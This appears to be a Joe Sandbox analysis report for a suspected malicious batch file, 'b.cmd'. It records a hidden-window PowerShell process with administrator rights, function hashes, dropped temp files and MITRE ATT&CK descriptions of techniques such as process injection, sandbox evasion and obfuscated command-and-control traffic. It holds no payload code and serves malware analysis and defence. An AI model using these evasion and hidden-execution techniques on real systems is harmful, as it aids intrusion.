Start time:	02:51:05
Start date:	26/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9B796E20 Relevance: 2.1, Strings: 1, Instructions: 869
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZK_H, xrefs: 00007FFD9B79CA6D

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID: ZK_H
API String ID: 0-3156204226
Opcode ID: 152f2ac28e81faa26f9d82a78a08ae31670464e2989bdcfbb4aa14a64e818906
Instruction ID: aabf2f201eeb478571b0076e226651f3b55582c5984f46159e20c57d4c98e2fd
Opcode Fuzzy Hash: 152f2ac28e81faa26f9d82a78a08ae31670464e2989bdcfbb4aa14a64e818906
Instruction Fuzzy Hash: A2427971B1EB8E4FEB58DB7884666B977D1FF55310B0543BED04AC72B6DE28A8028740

Function 00007FFD9B79C93B Relevance: 1.7, Strings: 1, Instructions: 469
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZK_H, xrefs: 00007FFD9B79CA6D

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID: ZK_H
API String ID: 0-3156204226
Opcode ID: 92928f7aec1312a36e64fc84a6b982a7fb247a9f8967566b1d7a7d52d66546e4
Instruction ID: 146539b5962b758727eca21795f7611cc340825aa4aed986ff72b3aaeb00aa36
Opcode Fuzzy Hash: 92928f7aec1312a36e64fc84a6b982a7fb247a9f8967566b1d7a7d52d66546e4
Instruction Fuzzy Hash: 30E11771B1EB8A4FEB99DB7C84266A977D1EF95310B0582FED04AC72F6DD285C028740

Function 00007FFD9B79CA35 Relevance: 1.6, Strings: 1, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZK_H, xrefs: 00007FFD9B79CA6D

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID: ZK_H
API String ID: 0-3156204226
Opcode ID: 1b4eba233832ce54de0719c0b3c59b1275cd1ee042add5a8b69f0d14e4aaa8ce
Instruction ID: 404dcad692a76b878d7a4c1f48cfb1529d40cc95c7cb53caa75f64f9f629b5c6
Opcode Fuzzy Hash: 1b4eba233832ce54de0719c0b3c59b1275cd1ee042add5a8b69f0d14e4aaa8ce
Instruction Fuzzy Hash: D9B12771B1EB8A4FEB599B7C84366A977D1EF95310B0542FED04ACB2F6DD285C028740

Function 00007FFD9B79CA90 Relevance: .3, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18286a65e56f52f30e6a765b8524ed02b4a5b2cb920f339943ba8099f20a724
Instruction ID: 7b5c1fda22c09a15aa9212a874bc69e156a5993e84aeb1537ce511a287958698
Opcode Fuzzy Hash: b18286a65e56f52f30e6a765b8524ed02b4a5b2cb920f339943ba8099f20a724
Instruction Fuzzy Hash: 95A13771B0EB8A4FEB599B7C84366A977D1EF95310B0542FED04ACB2F6DD285C428740

Function 00007FFD9B79D4F9 Relevance: 1.7, APIs: 1, Instructions: 246
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B79D6CE

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9fad25dc1c95d52ba46f5e38d314b465be23e077513438fab2fd0ff48225e32b
Instruction ID: e26f90bdf47334ae997cb7f95826f03482c02b5b03854591b057258a46142e95
Opcode Fuzzy Hash: 9fad25dc1c95d52ba46f5e38d314b465be23e077513438fab2fd0ff48225e32b
Instruction Fuzzy Hash: 3D71E471A0DB484FD758DF6CD859AA97BE0FF59314F0542BEE04DD32A2DB24A8028781

Function 00007FFD9B7945D4 Relevance: 1.6, APIs: 1, Instructions: 130
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FFD9B79D6CE

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d2e7862fae98592da46975e60accf117f762eb7132bb1f939de436e8dcd4c2b6
Instruction ID: 4b4b49d9054ff2726594c2a551378deaaa35054d73bc7e19028d1a6a7d20d3dc
Opcode Fuzzy Hash: d2e7862fae98592da46975e60accf117f762eb7132bb1f939de436e8dcd4c2b6
Instruction Fuzzy Hash: 9D319331A1CA1C8FDB58EF58D849AF977E0FB69311F04422EE04EE3251DB71A9018BC1

Function 00007FFD9B7945E4 Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE ref: 00007FFD9B7DFCB5

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: bdf655953c54c964378b5d81d537fa0035041b3df63f456ed32b6e66c6593d6f
Instruction ID: f9ee384bbec338ea960905eafed599cdab082c131adc58e6b983626fc4346bd0
Opcode Fuzzy Hash: bdf655953c54c964378b5d81d537fa0035041b3df63f456ed32b6e66c6593d6f
Instruction Fuzzy Hash: 7C21A330A08A0C9FDB58EB98D849BFDB7E0FB95321F10422ED04ED3691DB71A815CB91

Function 00007FFD9B8615DD Relevance: .7, Instructions: 660
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1777020577.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67ab2c6c809fbb5975fd6fba33610441162aa2db27beef49c5c1f176b4f0a09f
Instruction ID: 3c18014d5c362b11b2115eb8ea416edad03b87a4f406b32303605dcaf93bbe85
Opcode Fuzzy Hash: 67ab2c6c809fbb5975fd6fba33610441162aa2db27beef49c5c1f176b4f0a09f
Instruction Fuzzy Hash: 38122721A0FBC94FE3A6977858355B87BE1EF56210B4A01FBD089CB1E3DD189D06C392

Non-executed Functions

Function 00007FFD9B79F8D8 Relevance: 2.0, Strings: 1, Instructions: 750COMMON

Download Yara Rule

Strings

eI_^, xrefs: 00007FFD9B7C10DF

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID: eI_^
API String ID: 0-3408774493
Opcode ID: f1dd9b56219d70020d906c6cca416a592d544265d579cedc844bdbe8448e1c18
Instruction ID: 163e48c58e321faf968ae4538ca35a3e45c8182d279eb6f0e56c16fe72e01e04
Opcode Fuzzy Hash: f1dd9b56219d70020d906c6cca416a592d544265d579cedc844bdbe8448e1c18
Instruction Fuzzy Hash: 50220631B1DB495BE76CEA68946267973C2FF98700F51427DE04EC33E3DE29B9028681

Function 00007FFD9B797CA0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B79C594

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: cb83190e0d7e595e69c20d33c32ba2d556f1b539183fa2ed1c1d5ff379f381c8
Instruction ID: 25c0005e82c0bed385a759161805b214142bb93113c91e1f514179cee957bf7b
Opcode Fuzzy Hash: cb83190e0d7e595e69c20d33c32ba2d556f1b539183fa2ed1c1d5ff379f381c8
Instruction Fuzzy Hash: C3125131A1DB4A4FEB29EA6884615B1B7E0FF51310B1547BEC09BC75B7EE24B9038780

Function 00007FFD9B79F50D Relevance: 1.7, Strings: 1, Instructions: 470COMMON

Download Yara Rule

Strings

NK_^, xrefs: 00007FFD9B79F601

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID: NK_^
API String ID: 0-2544938843
Opcode ID: 6cd53f438e7c9d06d56be2e8306b9b27320edfdec11219b68a178aa179e55130
Instruction ID: 249e0e6f017ccef4c1b3c3c3ce777f796bdfd0c95a0f0f5719767b66cc097a70
Opcode Fuzzy Hash: 6cd53f438e7c9d06d56be2e8306b9b27320edfdec11219b68a178aa179e55130
Instruction Fuzzy Hash: CCD15717B0EA9A1EE325B2AC78B15FC7B51DF41324B0943FBE19D8A0E7CE08644687D1

Function 00007FFD9B7948FD Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1776441049.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9b790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e69b307b3b64a0b68abed1e387f617002bfbc60f6b5d3df6c784e9e2560abf
Instruction ID: c9d972125e249dc4cfef05194b1b9a471453c1ba62fad4d18224588d94850893
Opcode Fuzzy Hash: e5e69b307b3b64a0b68abed1e387f617002bfbc60f6b5d3df6c784e9e2560abf
Instruction Fuzzy Hash: 89413F67A0F7D61FE76256BD5CF90D53F50EE9267870E03FBC4D4860F3A90A290A8251

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report b.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ojf2mp0.mqs.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laz5iitu.x1c.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scsfgjn1.nho.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaksudmg.0xf.ps1

\Device\ConDrv

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
b.cmd

Function 00007FFD9B796E20 Relevance: 2.1, Strings: 1, Instructions: 869
COMMON

Function 00007FFD9B79C93B Relevance: 1.7, Strings: 1, Instructions: 469
COMMON

Function 00007FFD9B79CA35 Relevance: 1.6, Strings: 1, Instructions: 363
COMMON

Function 00007FFD9B79CA90 Relevance: .3, Instructions: 331
COMMON

Function 00007FFD9B79D4F9 Relevance: 1.7, APIs: 1, Instructions: 246
fileCOMMON

Function 00007FFD9B7945D4 Relevance: 1.6, APIs: 1, Instructions: 130
fileCOMMON

Function 00007FFD9B7945E4 Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Function 00007FFD9B8615DD Relevance: .7, Instructions: 660
COMMON